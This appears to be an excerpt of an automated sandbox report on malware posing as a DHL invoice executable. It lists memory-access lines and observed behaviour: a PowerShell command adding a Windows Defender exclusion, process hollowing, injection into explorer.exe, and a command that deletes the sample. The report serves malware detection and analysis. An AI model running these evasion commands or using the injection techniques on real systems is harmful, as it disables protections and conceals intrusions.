Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]	5_2_01966962
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01966962 mov eax, dword ptr fs:[00000030h]	5_2_01966962
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0198096E mov eax, dword ptr fs:[00000030h]	5_2_0198096E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0198096E mov edx, dword ptr fs:[00000030h]	5_2_0198096E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0198096E mov eax, dword ptr fs:[00000030h]	5_2_0198096E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019CC89D mov eax, dword ptr fs:[00000030h]	5_2_019CC89D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01940887 mov eax, dword ptr fs:[00000030h]	5_2_01940887
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0A8E4 mov eax, dword ptr fs:[00000030h]	5_2_01A0A8E4
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196E8C0 mov eax, dword ptr fs:[00000030h]	5_2_0196E8C0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197C8F9 mov eax, dword ptr fs:[00000030h]	5_2_0197C8F9
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197C8F9 mov eax, dword ptr fs:[00000030h]	5_2_0197C8F9
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019CC810 mov eax, dword ptr fs:[00000030h]	5_2_019CC810
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]	5_2_01962835
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]	5_2_01962835
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]	5_2_01962835
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01962835 mov ecx, dword ptr fs:[00000030h]	5_2_01962835
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]	5_2_01962835
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01962835 mov eax, dword ptr fs:[00000030h]	5_2_01962835
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019E483A mov eax, dword ptr fs:[00000030h]	5_2_019E483A
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019E483A mov eax, dword ptr fs:[00000030h]	5_2_019E483A
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197A830 mov eax, dword ptr fs:[00000030h]	5_2_0197A830
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01970854 mov eax, dword ptr fs:[00000030h]	5_2_01970854
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01944859 mov eax, dword ptr fs:[00000030h]	5_2_01944859
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01944859 mov eax, dword ptr fs:[00000030h]	5_2_01944859
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01952840 mov ecx, dword ptr fs:[00000030h]	5_2_01952840
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D6870 mov eax, dword ptr fs:[00000030h]	5_2_019D6870
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D6870 mov eax, dword ptr fs:[00000030h]	5_2_019D6870
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019CE872 mov eax, dword ptr fs:[00000030h]	5_2_019CE872
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019CE872 mov eax, dword ptr fs:[00000030h]	5_2_019CE872
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950BBE mov eax, dword ptr fs:[00000030h]	5_2_01950BBE
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950BBE mov eax, dword ptr fs:[00000030h]	5_2_01950BBE
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F4BB0 mov eax, dword ptr fs:[00000030h]	5_2_019F4BB0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F4BB0 mov eax, dword ptr fs:[00000030h]	5_2_019F4BB0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EEBD0 mov eax, dword ptr fs:[00000030h]	5_2_019EEBD0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]	5_2_01940BCD
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]	5_2_01940BCD
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01940BCD mov eax, dword ptr fs:[00000030h]	5_2_01940BCD
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]	5_2_01960BCB
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]	5_2_01960BCB
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01960BCB mov eax, dword ptr fs:[00000030h]	5_2_01960BCB
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]	5_2_01948BF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]	5_2_01948BF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01948BF0 mov eax, dword ptr fs:[00000030h]	5_2_01948BF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196EBFC mov eax, dword ptr fs:[00000030h]	5_2_0196EBFC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019CCBF0 mov eax, dword ptr fs:[00000030h]	5_2_019CCBF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BEB1D mov eax, dword ptr fs:[00000030h]	5_2_019BEB1D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A08B28 mov eax, dword ptr fs:[00000030h]	5_2_01A08B28
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A08B28 mov eax, dword ptr fs:[00000030h]	5_2_01A08B28
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196EB20 mov eax, dword ptr fs:[00000030h]	5_2_0196EB20
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196EB20 mov eax, dword ptr fs:[00000030h]	5_2_0196EB20
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EEB50 mov eax, dword ptr fs:[00000030h]	5_2_019EEB50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F4B4B mov eax, dword ptr fs:[00000030h]	5_2_019F4B4B
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F4B4B mov eax, dword ptr fs:[00000030h]	5_2_019F4B4B
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019E8B42 mov eax, dword ptr fs:[00000030h]	5_2_019E8B42
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D6B40 mov eax, dword ptr fs:[00000030h]	5_2_019D6B40
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D6B40 mov eax, dword ptr fs:[00000030h]	5_2_019D6B40
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0AB40 mov eax, dword ptr fs:[00000030h]	5_2_01A0AB40
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0193CB7E mov eax, dword ptr fs:[00000030h]	5_2_0193CB7E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01978A90 mov edx, dword ptr fs:[00000030h]	5_2_01978A90
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80 mov eax, dword ptr fs:[00000030h]	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A14A80 mov eax, dword ptr fs:[00000030h]	5_2_01A14A80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01948AA0 mov eax, dword ptr fs:[00000030h]	5_2_01948AA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01948AA0 mov eax, dword ptr fs:[00000030h]	5_2_01948AA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01996AA4 mov eax, dword ptr fs:[00000030h]	5_2_01996AA4
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01940AD0 mov eax, dword ptr fs:[00000030h]	5_2_01940AD0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01974AD0 mov eax, dword ptr fs:[00000030h]	5_2_01974AD0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01974AD0 mov eax, dword ptr fs:[00000030h]	5_2_01974AD0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]	5_2_01996ACC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]	5_2_01996ACC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01996ACC mov eax, dword ptr fs:[00000030h]	5_2_01996ACC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197AAEE mov eax, dword ptr fs:[00000030h]	5_2_0197AAEE
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197AAEE mov eax, dword ptr fs:[00000030h]	5_2_0197AAEE
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019CCA11 mov eax, dword ptr fs:[00000030h]	5_2_019CCA11
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01964A35 mov eax, dword ptr fs:[00000030h]	5_2_01964A35
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01964A35 mov eax, dword ptr fs:[00000030h]	5_2_01964A35
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CA38 mov eax, dword ptr fs:[00000030h]	5_2_0197CA38
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CA24 mov eax, dword ptr fs:[00000030h]	5_2_0197CA24
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196EA2E mov eax, dword ptr fs:[00000030h]	5_2_0196EA2E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]	5_2_01946A50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]	5_2_01946A50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]	5_2_01946A50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]	5_2_01946A50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]	5_2_01946A50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]	5_2_01946A50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946A50 mov eax, dword ptr fs:[00000030h]	5_2_01946A50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950A5B mov eax, dword ptr fs:[00000030h]	5_2_01950A5B
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950A5B mov eax, dword ptr fs:[00000030h]	5_2_01950A5B
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BCA72 mov eax, dword ptr fs:[00000030h]	5_2_019BCA72
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BCA72 mov eax, dword ptr fs:[00000030h]	5_2_019BCA72
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CA6F mov eax, dword ptr fs:[00000030h]	5_2_0197CA6F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CA6F mov eax, dword ptr fs:[00000030h]	5_2_0197CA6F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CA6F mov eax, dword ptr fs:[00000030h]	5_2_0197CA6F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EEA60 mov eax, dword ptr fs:[00000030h]	5_2_019EEA60
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A14DAD mov eax, dword ptr fs:[00000030h]	5_2_01A14DAD
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A08DAE mov eax, dword ptr fs:[00000030h]	5_2_01A08DAE
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A08DAE mov eax, dword ptr fs:[00000030h]	5_2_01A08DAE
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CDB1 mov ecx, dword ptr fs:[00000030h]	5_2_0197CDB1
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CDB1 mov eax, dword ptr fs:[00000030h]	5_2_0197CDB1
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197CDB1 mov eax, dword ptr fs:[00000030h]	5_2_0197CDB1
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01968DBF mov eax, dword ptr fs:[00000030h]	5_2_01968DBF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Memory written: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Thread register set: target process: 4084			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 4084			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: B0000

Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process created: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe"	Jump to behavior

Source: explorer.exe, 00000006.00000000.1477075584.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1472807052.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000003.3076771990.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.1472807052.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3884453822.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1472350042.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.1472807052.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3884925137.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000006.00000000.1472807052.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3884925137.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000003.3076771990.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285276911.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Queries volume information: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
